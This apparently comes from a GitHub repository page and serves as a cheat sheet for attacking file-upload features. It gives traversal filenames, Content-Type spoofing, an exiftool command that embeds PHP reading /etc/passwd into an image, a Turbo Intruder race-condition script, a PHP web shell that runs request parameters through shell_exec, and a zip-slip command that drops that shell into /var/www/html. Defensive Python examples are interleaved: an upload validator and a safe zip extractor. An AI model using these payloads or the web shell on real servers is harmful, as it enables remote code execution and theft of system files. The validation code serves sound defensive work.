AngelJuanMa/File-Uploads

Upload Files

Directory Traversal

Content-Disposition: form-data; name="avatar"; filename="../exploit.php"
Content-Disposition: form-data; name="avatar"; filename="..%2exploit.php"

Content-Type

Set the Content-Type to image/jpeg.

Extension blacklist bypass

Content-Disposition: form-data; name="avatar"; filename="exploit.php"

Metadata

exiftool -Comment="<?php echo 'START ' . file_get_contents('/etc/passwd') . ' END'; ?>" example.jpg -o polyglot.php

Race condition

# Turbo Intruder script (Burp extension): RequestEngine and table are supplied
# by the extension; the two request templates are pasted in from Burp.
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10)

    # the upload request (POST)
    request1 = '''<YOUR-POST-REQUEST>'''

    # the request that fetches the uploaded file (GET)
    request2 = '''<YOUR-GET-REQUEST>'''

    # the 'gate' argument blocks the final byte of each request until openGate is invoked
    engine.queue(request1, gate='race1')
    for x in range(5):
        engine.queue(request2, gate='race1')

    # wait until every 'race1' tagged request is ready
    # then send the final byte of each request
    # (this method is non-blocking, just like queue)
    engine.openGate('race1')

    engine.complete(timeout=60)


def handleResponse(req, interesting):
    # every response is shown in the results table for manual comparison
    table.add(req)

Test metadata

Upload xss_comment_exif_metadata_double_quote.png.

Compare the Content-Type the server returns for it: image/png versus text/html.

If it is possible to change src=, add URLs.

Browser message: The image "" cannot be displayed because it contains errors.

Use:

curl -s -X GET "https://domain.com/uploads/aJEa412rsdfgF" | html2text | mdcat
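The server side of the sections above (directory traversal, Content-Type, extension blacklist, metadata, race condition and test metadata), as an added example that is not code from this repository: a Python validator and storage routine that rejects traversal in the multipart filename including percent-encoded forms, uses an extension allow-list instead of a blacklist, requires the declared Content-Type and the file signature to agree, scans the bytes for code or markup smuggled into metadata (the exiftool polyglot and the EXIF XSS PNG), and only moves the file into the served directory, under a random server-chosen name, after validation has passed, which removes the write-then-delete window the race condition script relies on. The directory layout, the constructed sample bodies and the names validate_upload, store_upload, check and demo_store are assumptions of this example.

```python
import os
import re
import secrets
import tempfile
from urllib.parse import unquote

# Allow-list, never a blacklist: extension -> the only Content-Type accepted for it.
ALLOWED = {"jpg": "image/jpeg", "jpeg": "image/jpeg",
           "png": "image/png", "gif": "image/gif"}
# File signatures the bytes must start with for the claimed type.
MAGIC = {"image/jpeg": (b"\xff\xd8\xff",),
         "image/png": (b"\x89PNG\r\n\x1a\n",),
         "image/gif": (b"GIF87a", b"GIF89a")}
# Server-side code or markup smuggled into image metadata (polyglots, EXIF XSS).
ACTIVE = re.compile(rb"<\?(?:php|=)|<script|<svg|<iframe", re.IGNORECASE)


class UploadRejected(ValueError):
    pass


def safe_extension(filename):
    """Return the allow-listed extension of an untrusted filename, or raise."""
    name = filename
    for _ in range(3):  # decode until stable so encoded traversal surfaces
        decoded = unquote(name)
        if decoded == name:
            break
        name = decoded
    if "\x00" in name or ".." in name or "/" in name or "\\" in name:
        raise UploadRejected("path characters in filename")
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in ALLOWED:
        raise UploadRejected("extension not allowed: %r" % ext)
    return ext


def validate_upload(filename, declared_type, data):
    """Require name, declared Content-Type and bytes to agree; return the extension."""
    ext = safe_extension(filename)
    mime = ALLOWED[ext]
    if declared_type.split(";")[0].strip().lower() != mime:
        raise UploadRejected("Content-Type %r does not match .%s" % (declared_type, ext))
    if not data.startswith(MAGIC[mime]):
        raise UploadRejected("file signature does not match .%s" % ext)
    if ACTIVE.search(data):
        raise UploadRejected("active content embedded in image")
    return ext


def check(filename, declared_type, data):
    """Non-raising wrapper: 'ok:<ext>' or 'rejected:<reason>'."""
    try:
        return "ok:" + validate_upload(filename, declared_type, data)
    except UploadRejected as exc:
        return "rejected:" + str(exc)


def store_upload(filename, declared_type, data, quarantine_dir, public_dir):
    """Write to quarantine, validate, then publish under a server-chosen name.

    Nothing touches public_dir until validation has passed, so a racing GET has
    no write-then-delete window to hit, and the random name means the client's
    double extension (cmd.php.jpeg) never reaches the web server's handler
    mapping.  Both directories must sit on one filesystem so os.replace is atomic.
    """
    fd, tmp_path = tempfile.mkstemp(dir=quarantine_dir)
    try:
        with os.fdopen(fd, "wb") as fh:
            fh.write(data)
        ext = validate_upload(filename, declared_type, data)
        public_name = "%s.%s" % (secrets.token_hex(16), ext)
        os.replace(tmp_path, os.path.join(public_dir, public_name))
        return public_name
    except Exception:
        if os.path.exists(tmp_path):
            os.unlink(tmp_path)
        raise


# Constructed sample bodies, not real images: a signature plus padding.
JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 12
POLYGLOT = JPEG + b"<?php echo 'x'; ?>"  # stands in for an exiftool -Comment payload
PHP = b"<?php echo 1; ?>"


def demo_store():
    """Store one good and one bad upload; return what is left on disk afterwards."""
    quarantine, public = tempfile.mkdtemp(), tempfile.mkdtemp()
    published = store_upload("avatar.jpg", "image/jpeg", JPEG, quarantine, public)
    try:
        store_upload("cmd.php.jpeg", "image/jpeg", PHP, quarantine, public)
    except UploadRejected:
        pass
    return published, sorted(os.listdir(public)), os.listdir(quarantine)


if __name__ == "__main__":
    for case in [("avatar.jpg", "image/jpeg", JPEG), ("../exploit.php", "image/jpeg", PHP),
                 ("..%2exploit.php", "image/jpeg", PHP), ("exploit.php", "image/jpeg", PHP),
                 ("cmd.php.jpeg", "image/jpeg", PHP), ("polyglot.jpg", "image/jpeg", POLYGLOT),
                 ("avatar.jpg", "text/html", JPEG)]:
        print(case[0], case[1], "->", check(*case))
    print(demo_store())
```

For the stored XSS case the byte scan is only a backstop: the controls that actually matter are serving uploads with the Content-Type fixed at validation time rather than taken from the request, sending X-Content-Type-Options: nosniff, and hosting user files on a separate origin so that a payload which does get rendered cannot reach the application's session.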

Zip

cmd.php

<?php
    echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
?>

Bypass: cmd.php.jpeg (or .png, etc.)

zip -r cmd.zip ../../../../../../../../var/www/html/cmd.php
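The extraction side of the zip trick above, as an added example that is not code from this repository: each member name is resolved against the destination directory and anything that lands outside it, is absolute, contains a NUL byte or is a symlink is skipped instead of written. Python's own ZipFile.extractall already strips ".." components, so the check is written out here to make the logic visible for unpackers that do not. The archive contents, the destination layout and the names safe_extract, build_sample_zip and demo are constructed for this example.

```python
import io
import os
import tempfile
import zipfile

# Unix mode bits live in the high 16 bits of external_attr; this value marks a symlink.
S_IFLNK = 0o120000


def safe_extract(zip_bytes, dest_dir):
    """Extract only members that resolve inside dest_dir.

    Returns (extracted, rejected) lists of member names.  A symlink member is
    rejected because a later member could write through it to a path outside
    dest_dir even though its own name looks harmless.
    """
    dest = os.path.realpath(dest_dir)
    extracted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            target = os.path.realpath(os.path.join(dest, name))
            is_link = (info.external_attr >> 16) & 0o170000 == S_IFLNK
            if ("\x00" in name or name.startswith(("/", "\\")) or is_link
                    or os.path.commonpath([dest, target]) != dest):
                rejected.append(name)
                continue
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
            else:
                os.makedirs(os.path.dirname(target), exist_ok=True)
                with zf.open(info) as src, open(target, "wb") as dst:
                    dst.write(src.read())
            extracted.append(name)
    return extracted, rejected


def build_sample_zip():
    """Constructed archive: one legitimate member and one whose name climbs out
    of the destination, like the zip -r command above would produce."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("ok/image.jpg", b"\xff\xd8\xff\xe0 sample bytes")
        zf.writestr("../../../../../../../../var/www/html/cmd.php", b"placeholder, never written")
    return buf.getvalue()


def demo():
    """Extract the sample archive into a fresh directory and report what landed on disk."""
    dest = tempfile.mkdtemp()
    extracted, rejected = safe_extract(build_sample_zip(), dest)
    on_disk = sorted(os.path.relpath(os.path.join(root, f), dest)
                     for root, _, files in os.walk(dest) for f in files)
    return {"extracted": extracted, "rejected": rejected, "on_disk": on_disk}


if __name__ == "__main__":
    print(demo())
```

Containment is only the first gate: every file that survives extraction should then go through the same per-file checks (allow-listed extension, signature, metadata scan) as a file uploaded directly, since an archive is just a batch of uploads.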

About

Upload Files to XSS Stored File
